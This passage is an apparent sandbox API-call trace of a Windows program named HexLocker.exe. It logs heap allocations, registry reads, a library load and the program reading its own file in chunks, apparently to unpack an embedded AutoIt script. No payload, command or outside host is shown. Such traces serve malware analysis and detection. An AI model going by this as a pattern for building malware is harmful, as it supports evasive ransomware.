Flags=0x0, Size=0x10) returned 0x9760a0 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976758 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976178 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9766e8 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9760e8 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9766b8 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976658 [0121.012] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1aa [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9760b8 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976768 [0121.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x9704b8 [0121.013] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0121.013] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9761d8 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9767c8 [0121.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x8cfea8 | out: phkResult=0x8cfea8*=0x24c) returned 0x0 [0121.014] RegQueryValueExW (in: hKey=0x24c, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x8cfec8, lpcbData=0x8cfeac*=0x8 | out: lpType=0x0, lpData=0x8cfec8*=0x30, lpcbData=0x8cfeac*=0x4) returned 0x0 [0121.014] RegCloseKey (hKey=0x24c) returned 0x0 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976190 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9766c8 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976778 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976718 [0121.014] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9761c0 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976688 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x970500 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9767a8 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976010 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976638 [0121.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976070 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9766d8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9760d0 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976668 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976100 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9766a8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976118 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9767d8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976148 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9766f8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976b58 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976708 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976b88 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9767e8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976be8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976728 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976ba0 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976738 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976bb8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x9767b8 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976b28 [0121.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f40 [0121.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976bd0 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976ec0 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976b40 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e80 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976b70 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f10 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a98 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f50 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9768b8 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f20 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9769a8 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976ee0 [0121.017] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.017] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x400) returned 0x977008 [0121.017] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8cf8c0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0x25 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20a) returned 0x977410 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976ac8 [0121.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f60 [0121.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x8cf890 | out: phkResult=0x8cf890*=0x0) returned 0x2 [0121.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ac8 | out: hHeap=0x970000) returned 1 [0121.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976f60 | out: hHeap=0x970000) returned 1 [0121.020] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.021] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.021] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.021] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x74310000 [0121.118] GetProcAddress (hModule=0x74310000, lpProcName="IsThemeActive") returned 0x74342890 [0121.118] IsThemeActive () returned 0x1 [0121.431] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x8cfea8, fWinIni=0x0 | out: pvParam=0x8cfea8) returned 1 [0121.431] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 0 [0121.431] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8cfc88 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0121.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9768a0 [0121.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e90 [0121.431] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a7f6c, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0x25 [0121.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0121.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x976e60 [0121.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x976e60, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0121.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e60 | out: hHeap=0x970000) returned 1 [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.432] SetLastError (dwErrCode=0x0) [0121.432] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.433] GetLastError () returned 0x0 [0121.433] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.434] GetLastError () returned 0x0 [0121.434] SetLastError (dwErrCode=0x0) [0121.435] GetLastError () returned 0x0 [0121.435] SetLastError (dwErrCode=0x0) [0121.435] GetLastError () returned 0x0 [0121.435] SetLastError (dwErrCode=0x0) [0121.435] GetLastError () returned 0x0 [0121.435] SetLastError (dwErrCode=0x0) [0121.435] GetLastError () returned 0x0 [0121.435] SetLastError (dwErrCode=0x0) [0121.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x970528 [0121.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x970548 [0121.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8cf6dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0121.437] GetFileType (hFile=0x254) returned 0x1 [0121.440] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.442] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0121.443] SetFilePointer (in: hFile=0x254, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0121.443] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.443] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0121.443] SetFilePointer (in: hFile=0x254, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0121.444] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.444] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0121.444] SetFilePointer (in: hFile=0x254, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0121.444] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.445] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0121.445] SetFilePointer (in: hFile=0x254, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0121.445] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.447] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0121.447] SetFilePointer (in: hFile=0x254, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0121.447] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.448] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0121.448] SetFilePointer (in: hFile=0x254, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0121.448] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.449] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0121.449] SetFilePointer (in: hFile=0x254, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0121.449] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.450] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0121.450] SetFilePointer (in: hFile=0x254, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0121.450] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.452] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0121.452] SetFilePointer (in: hFile=0x254, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0121.452] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.453] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0121.453] SetFilePointer (in: hFile=0x254, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0121.453] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.453] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaff38 [0121.453] SetFilePointer (in: hFile=0x254, lDistanceToMove=720676, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaff24 [0121.454] ReadFile (in: hFile=0x254, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0121.454] SetFilePointer (in: hFile=0x254, lDistanceToMove=726548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb1614 [0121.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1000) returned 0x977628 [0121.455] ReadFile (in: hFile=0x254, lpBuffer=0x977628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bf6c4, lpOverlapped=0x0 | out: lpBuffer=0x977628*, lpNumberOfBytesRead=0x8bf6c4*=0x1000, lpOverlapped=0x0) returned 1 [0121.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf6f4 | out: lpSystemTimeAsFileTime=0x8cf6f4*(dwLowDateTime=0xee733e39, dwHighDateTime=0x1d67c7d)) [0121.455] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2614 [0121.455] SetFilePointer (in: hFile=0x254, lDistanceToMove=726568, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb1628 [0121.455] ReadFile (in: hFile=0x254, lpBuffer=0x977628, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x977628*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0121.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee7365be, dwHighDateTime=0x1d67c7d)) [0121.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee7365be, dwHighDateTime=0x1d67c7d)) [0121.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee7365be, dwHighDateTime=0x1d67c7d)) [0121.456] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb1828 [0121.456] SetFilePointer (in: hFile=0x254, lDistanceToMove=726715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb16bb [0121.456] ReadFile (in: hFile=0x254, lpBuffer=0x977628, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x977628*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0121.457] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb18bb [0121.457] SetFilePointer (in: hFile=0x254, lDistanceToMove=731707, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb2a3b [0121.457] ReadFile (in: hFile=0x254, lpBuffer=0x977628, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x977628*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0121.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee738d43, dwHighDateTime=0x1d67c7d)) [0121.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee738d43, dwHighDateTime=0x1d67c7d)) [0121.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee73b457, dwHighDateTime=0x1d67c7d)) [0121.458] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2c3b [0121.458] SetFilePointer (in: hFile=0x254, lDistanceToMove=731822, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb2aae [0121.458] ReadFile (in: hFile=0x254, lpBuffer=0x977628, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x977628*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0121.458] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2cae [0121.458] SetFilePointer (in: hFile=0x254, lDistanceToMove=802910, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc405e [0121.458] ReadFile (in: hFile=0x254, lpBuffer=0x977628, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x977628*, lpNumberOfBytesRead=0x8cedd0*=0x8, lpOverlapped=0x0) returned 1 [0121.459] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0xee73da86, dwHighDateTime=0x1d67c7d)) [0121.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977628 | out: hHeap=0x970000) returned 1 [0121.460] CloseHandle (hObject=0x254) returned 1 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a80 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x970568 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976e40 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x971d50 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9769c0 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976ef0 [0121.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769c0 | out: hHeap=0x970000) returned 1 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x971d78 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976960 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976af8 [0121.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x970568 | out: hHeap=0x970000) returned 1 [0121.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e40 | out: hHeap=0x970000) returned 1 [0121.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976a80 | out: hHeap=0x970000) returned 1 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9768d0 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f00 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976a50 [0121.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976f30 [0121.461] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x970568 [0121.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9768e8 